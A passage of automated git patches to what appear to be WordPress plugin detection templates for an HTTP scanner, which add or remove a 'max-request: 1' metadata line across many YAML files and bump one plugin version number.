diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 32ee9d8ebbac28ddde0502eb7e6b3f82e978d86e Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 04:01:57 +0000
Subject: [PATCH 0626/1090] Auto WordPress Plugins Update [Sun Oct  1 04:01:57
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/child-theme-configurator.txt          | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/child-theme-configurator.txt b/helpers/wordpress/plugins/child-theme-configurator.txt
index d5724cd41b..bd4053bfb1 100644
--- a/helpers/wordpress/plugins/child-theme-configurator.txt
+++ b/helpers/wordpress/plugins/child-theme-configurator.txt
@@ -1 +1 @@
-2.6.2
\ No newline at end of file
+2.6.3
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
